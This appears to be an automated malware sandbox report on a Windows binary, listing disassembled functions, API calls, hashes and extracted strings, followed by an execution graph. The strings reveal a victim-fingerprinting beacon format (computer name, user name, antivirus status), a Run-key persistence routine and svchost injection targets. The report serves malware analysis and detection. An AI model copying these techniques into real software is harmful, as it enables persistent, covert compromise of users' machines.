                                                                                        • Instruction ID: 49e55a3650120ea37a658fb2d5a98e758df3912c3bc122704051c4ccf46bda63
                                                                                        • Opcode Fuzzy Hash: ab93a9697e7db49f45cab12df12d8e20f72fdeb3fe900da885d9202ed212137f
                                                                                        • Instruction Fuzzy Hash: 31014F6292D612C2E7318F41F44436E77A0FBA6B48F640175F68D86698CF3CDA49DB00
                                                                                        Function 00007FF60E63F758 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                        • String ID:
                                                                                        • API String ID: 2998201375-0
                                                                                        • Opcode ID: 5223744fd3fccca467624dc8a192276cd82e61384c6ea2980f54dffe725d773f
                                                                                        • Instruction ID: 9f479206b39b17de42ad1430035ce3716545da7b8936b8c1382a9e9164842236
                                                                                        • Opcode Fuzzy Hash: 5223744fd3fccca467624dc8a192276cd82e61384c6ea2980f54dffe725d773f
                                                                                        • Instruction Fuzzy Hash: 1B41C332F2879286EB648F25B5402B96BB5FFA4B90F244135FA8D97B95CF3CD4419700
                                                                                        Function 00007FF60E6312F4 Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                        • String ID:
                                                                                        • API String ID: 2850635065-0
                                                                                        • Opcode ID: 0e751263ca790cefd0de29730052997415424a4d3fcfa03dfa405769945a3833
                                                                                        • Instruction ID: d83242ffaaac3d417605b97915233f718ba443c9764c0199024188800d1300d3
                                                                                        • Opcode Fuzzy Hash: 0e751263ca790cefd0de29730052997415424a4d3fcfa03dfa405769945a3833
                                                                                        • Instruction Fuzzy Hash: AC110372A2D65286E7609B20F44833EB760FBA57A4F504235F59EC29A8DF3CD545DB00
                                                                                        Function 00007FF60E6329AC Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: _getptd$_inconsistency$DecodePointer_getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 3566995948-0
                                                                                        • Opcode ID: ee8c12c8554f5530bc3b28713b5296e1af5c1cc8e122cf2103e50e6ee38f58da
                                                                                        • Instruction ID: e07ab7d9407b1e54121ae4fcc68b069cb8eae6fa44ab61505bb038a152f8d4bd
                                                                                        • Opcode Fuzzy Hash: ee8c12c8554f5530bc3b28713b5296e1af5c1cc8e122cf2103e50e6ee38f58da
                                                                                        • Instruction Fuzzy Hash: 4CF08922E28592D0EA506B72F0411FC5665FF78B80F2C5531F74D472C7DE19E490A310
                                                                                        Function 00007FF60E62D070 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 108COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: Version_snprintf
                                                                                        • String ID: 3.2$info=1&uid=%s&ver=%s&os=%u.%u.%u&cmpname=%s&username=%s&ut=%d&av=%d
                                                                                        • API String ID: 2221195653-1629646224
                                                                                        • Opcode ID: d8e065c0954a299e65155b93d3e3b5ceec94708ba317d722836e874e1f68d53d
                                                                                        • Instruction ID: 80775f818ba3eb0aaae21c3df7ffeec47af89444c6fac1822beebbc3e141ee3a
                                                                                        • Opcode Fuzzy Hash: d8e065c0954a299e65155b93d3e3b5ceec94708ba317d722836e874e1f68d53d
                                                                                        • Instruction Fuzzy Hash: 7751D672618AC58AD764CB24F4543AAB7A1F7D8790F604229EB9DC3BA8DF7CD444DB00
                                                                                        Function 00007FF60E631590 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _callnewh.LIBCMT ref: 00007FF60E63159E
                                                                                        • malloc.LIBCMT ref: 00007FF60E6315AA
                                                                                          • Part of subcall function 00007FF60E63244C: _FF_MSGBANNER.LIBCMT ref: 00007FF60E63247C
                                                                                          • Part of subcall function 00007FF60E63244C: _NMSG_WRITE.LIBCMT ref: 00007FF60E632486
                                                                                          • Part of subcall function 00007FF60E63244C: HeapAlloc.KERNEL32(?,?,00000000,00007FF60E634284,?,?,?,00007FF60E63AD9C,?,?,?,00007FF60E63AC9B,?,?,00000000,00007FF60E635832), ref: 00007FF60E6324A1
                                                                                          • Part of subcall function 00007FF60E63244C: _callnewh.LIBCMT ref: 00007FF60E6324BA
                                                                                          • Part of subcall function 00007FF60E63244C: _errno.LIBCMT ref: 00007FF60E6324C5
                                                                                          • Part of subcall function 00007FF60E63244C: _errno.LIBCMT ref: 00007FF60E6324D0
                                                                                        • _CxxThrowException.LIBCMT ref: 00007FF60E6315F3
                                                                                          • Part of subcall function 00007FF60E632504: RtlPcToFileHeader.NTDLL ref: 00007FF60E632593
                                                                                          • Part of subcall function 00007FF60E632504: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF60E6404BE), ref: 00007FF60E6325D2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
                                                                                        • String ID: bad allocation
                                                                                        • API String ID: 1214304046-2104205924
                                                                                        • Opcode ID: 3b8e8bd193397a22c989b775499798885fd0ff8c1caff98f5e3a105427b3f2ea
                                                                                        • Instruction ID: 3e7657ad4ad003b3f8d347e4688ab8fe50cf383fc15485e31ca02f82e710b8c7
                                                                                        • Opcode Fuzzy Hash: 3b8e8bd193397a22c989b775499798885fd0ff8c1caff98f5e3a105427b3f2ea
                                                                                        • Instruction Fuzzy Hash: AE0104A5F29B5780EF149B61F4601B96364EFA6384F685031FA4D87BA7EE3CE141D700
                                                                                        Function 00007FF60E630F48 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenValue
                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                        • API String ID: 779948276-1428018034
                                                                                        • Opcode ID: 4a561f427d5a0833e66d88e195127c8b8fb31ed43f9b64d14c46dfc272e21bc7
                                                                                        • Instruction ID: 3177e71b35d86347d5ef2b2aac785e94b3b8982963eff7ba73c9126af0dcff0f
                                                                                        • Opcode Fuzzy Hash: 4a561f427d5a0833e66d88e195127c8b8fb31ed43f9b64d14c46dfc272e21bc7
                                                                                        • Instruction Fuzzy Hash: 60114276628B91C6DB908F15F44466A77B0F7997A0F601225FA9E43BA8DF3DD044DB00
                                                                                        Function 00007FF60E6456A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                        • String ID: csm
                                                                                        • API String ID: 2821275340-1018135373
                                                                                        • Opcode ID: c927b15099e8d8d8a14847beea8bde30514249613e58caf7d211df8e6c6ec09d
                                                                                        • Instruction ID: 2aee99019f5bbe419409dd0e93e117289317c53e860713c88b67f742617eb782
                                                                                        • Opcode Fuzzy Hash: c927b15099e8d8d8a14847beea8bde30514249613e58caf7d211df8e6c6ec09d
                                                                                        • Instruction Fuzzy Hash: 48016767D1469286DB20DF35E8512BC23A5EB75755F241431FD4E8F656CE28D480D300
                                                                                        Function 00007FF60E6122BC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentExpandStrings
                                                                                        • String ID: %SystemRoot%\SysWoW64\svchost.exe$%SystemRoot%\system32\svchost.exe
                                                                                        • API String ID: 237503144-2871004979
                                                                                        • Opcode ID: 26d235ddc8eb93f07edcb8965c1cf58c0c2aab6b495efb37e2acaf60aadbeeb9
                                                                                        • Instruction ID: 965ef4531b7ece2536440cd9867868b2e2b53f8081003f0a576ef247b0baf269
                                                                                        • Opcode Fuzzy Hash: 26d235ddc8eb93f07edcb8965c1cf58c0c2aab6b495efb37e2acaf60aadbeeb9
                                                                                        • Instruction Fuzzy Hash: CFF0A7B1A3D5A2C1D7118B12F45002E7B60F7B5B80F601432F58A83A68CF2CE540EF00
                                                                                        Function 00007FF60E611088 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: GetThreadId$kernel32
                                                                                        • API String ID: 1646373207-2383230424
                                                                                        • Opcode ID: e461afaf8c1bd09b320089634cf66b20fcf42d2cd2d08406a6f8b5433de6df5f
                                                                                        • Instruction ID: 41643a6450766168c2f1e4d0809536905bc4efdeb11323e7a08a8af5d2326de1
                                                                                        • Opcode Fuzzy Hash: e461afaf8c1bd09b320089634cf66b20fcf42d2cd2d08406a6f8b5433de6df5f
                                                                                        • Instruction Fuzzy Hash: 85E09261D29A92C2D7619F10F81432D23B0FB95745FA00075F68E82664DF3CD54DDB00
                                                                                        Function 00007FF60E611600 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: CreateProcessInternalW$kernel32
                                                                                        • API String ID: 1646373207-4069603262
                                                                                        • Opcode ID: d95c6e7916faab0d17594eb83d8a00f0299812b173539474de4610889b1bf182
                                                                                        • Instruction ID: b6636a6a41b388058ea680efe05d2cf570b59e02f89b21238386539f6eefb00d
                                                                                        • Opcode Fuzzy Hash: d95c6e7916faab0d17594eb83d8a00f0299812b173539474de4610889b1bf182
                                                                                        • Instruction Fuzzy Hash: AAE01A66E39A62C2E711DB00F92036923A0BB75780FA00132F58EC2260DF3CE559E600
                                                                                        Function 00007FF60E62BCD8 Relevance: 6.1, APIs: 4, Instructions: 121COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: Mtx_guardMtx_guard::~_$char_traits
                                                                                        • String ID:
                                                                                        • API String ID: 1723400902-0
                                                                                        • Opcode ID: 3577689191e647b2eba0244f68066ee36e99a69f77505bdd8bbac9a00180cfdb
                                                                                        • Instruction ID: dfbe83b3a4bb8565c93c567f38bee0895cf9a7a9d23d71a485ec954b8ac80301
                                                                                        • Opcode Fuzzy Hash: 3577689191e647b2eba0244f68066ee36e99a69f77505bdd8bbac9a00180cfdb
                                                                                        • Instruction Fuzzy Hash: D651EF76A2CF9582DA10DB5AF44026EA761F7D5BC4F100526FB9D87B69DF3CE4408B40
                                                                                        Function 00007FF60E6400B0 Relevance: 6.1, APIs: 4, Instructions: 76COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharErrorLastMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 203985260-0
                                                                                        • Opcode ID: cc073f878938fc799904678768523023e3297de0d63febdb3c1fef3ad7fee24c
                                                                                        • Instruction ID: b47b53d6b792e37796dd0eddcbd658b099c45d67e849c32d834fbf8f0a82babb
                                                                                        • Opcode Fuzzy Hash: cc073f878938fc799904678768523023e3297de0d63febdb3c1fef3ad7fee24c
                                                                                        • Instruction Fuzzy Hash: BE3186B1A287A282E7509B71B41017A76D5FB91BA4F344739FB9983BE5DF3CD011AB00
                                                                                        Function 00007FF60E617DF4 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: shared_ptr$allocator
                                                                                        • String ID:
                                                                                        • API String ID: 426846764-0
                                                                                        • Opcode ID: 46d84b3b4c7e8204a3866c78015af3c28403f43d119607c22453800ec736fa57
                                                                                        • Instruction ID: a7d8bda9dbed4406badb55d0c54badd69577142cf113c15a7b1fc9e012489560
                                                                                        • Opcode Fuzzy Hash: 46d84b3b4c7e8204a3866c78015af3c28403f43d119607c22453800ec736fa57
                                                                                        • Instruction Fuzzy Hash: 6F013C32A1CB9181EA12DB55F44006AA7A0FBD4BC0F644172FACD8776ACF3CE141DB40
                                                                                        Function 00007FF60E617B08 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID: shared_ptr$allocator
                                                                                        • String ID:
                                                                                        • API String ID: 426846764-0
                                                                                        • Opcode ID: aa8f5e9cd53f442f27dac48b976c39207e82458efe65fc0543b9c79fb7a2506d
                                                                                        • Instruction ID: d4eaf27e1246a941e73c828a193b7f29bcd11c9bef711198f47596ad0834ced6
                                                                                        • Opcode Fuzzy Hash: aa8f5e9cd53f442f27dac48b976c39207e82458efe65fc0543b9c79fb7a2506d
                                                                                        • Instruction Fuzzy Hash: 27016D22A2CB9581EA01DB65F44002AA3A1FBD4BC0F644132FACD8776ADF3CE1419B00
                                                                                        Function 00007FF60E618320 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 196COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2191449237.00007FF60E611000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF60E610000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2191373286.00007FF60E610000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191746519.00007FF60E646000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191854067.00007FF60E654000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2191965609.00007FF60E65A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2192099654.00007FF60E661000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ff60e610000_8D8EBC2422383023011859.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $$$
                                                                                        • API String ID: 0-233714265
                                                                                        • Opcode ID: bea3f275805cb3c61198a70ac9404b13dde8b97b0dc19bbc96532ad67e767dc4
                                                                                        • Instruction ID: e47ddf48986b7886444ee68dddc640e45c1d59c6f5ea01d9b042d734e22e93c8
                                                                                        • Opcode Fuzzy Hash: bea3f275805cb3c61198a70ac9404b13dde8b97b0dc19bbc96532ad67e767dc4
                                                                                        • Instruction Fuzzy Hash: E1A14A2261CBD580DA71CB45F4903AEB3A0F7D5780F648822FA8E93B59DE3CD445DB40

                                                                                        Execution Graph

                                                                                        Execution Coverage:2%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:1125
                                                                                        Total number of Limit Nodes:10
                                                                                        execution_graph 19035 7ff60bfa36b0 19073 7ff60bfaa198 GetStartupInfoW 19035->19073 19037 7ff60bfa36c4 19074 7ff60bfa6bd0 GetProcessHeap 19037->19074 19039 7ff60bfa3724 19040 7ff60bfa374a 19039->19040 19042 7ff60bfa3731 19039->19042 19043 7ff60bfa3736 19039->19043 19075 7ff60bfa5890 19040->19075 19161 7ff60bfa3840 19042->19161 19170 7ff60bfa38b4 19043->19170 19049 7ff60bfa3761 19052 7ff60bfa38b4 _NMSG_WRITE 68 API calls 19049->19052 19050 7ff60bfa375c 19051 7ff60bfa3840 _FF_MSGBANNER 68 API calls 19050->19051 19051->19049 19053 7ff60bfa376b 19052->19053 19055 7ff60bfa3e08 malloc 3 API calls 19053->19055 19054 7ff60bfa3775 _ioinit0 _RTC_Initialize 19056 7ff60bfa3780 GetCommandLineW 19054->19056 19055->19054 19090 7ff60bfaa010 GetEnvironmentStringsW 19056->19090 19061 7ff60bfa37ac 19103 7ff60bfa9d68 19061->19103 19065 7ff60bfa37bf 19119 7ff60bfa3e68 19065->19119 19066 7ff60bfa3e20 _lock 68 API calls 19066->19065 19068 7ff60bfa37c9 19069 7ff60bfa37d4 19068->19069 19070 7ff60bfa3e20 _lock 68 API calls 19068->19070 19125 7ff60bf9fba0 19069->19125 19070->19069 19073->19037 19074->19039 19220 7ff60bfa3f24 EncodePointer 19075->19220 19077 7ff60bfa589b 19223 7ff60bfaae00 19077->19223 19079 7ff60bfa58a0 19080 7ff60bfa5902 19079->19080 19083 7ff60bfa58bb 19079->19083 19241 7ff60bfa5910 19080->19241 19227 7ff60bfa41d4 19083->19227 19086 7ff60bfa58d2 FlsSetValue 19086->19080 19087 7ff60bfa58e4 19086->19087 19232 7ff60bfa57d4 19087->19232 19091 7ff60bfa3792 19090->19091 19092 7ff60bfaa036 19090->19092 19097 7ff60bfa9ae0 GetModuleFileNameW 19091->19097 19094 7ff60bfa4254 _malloc_crt 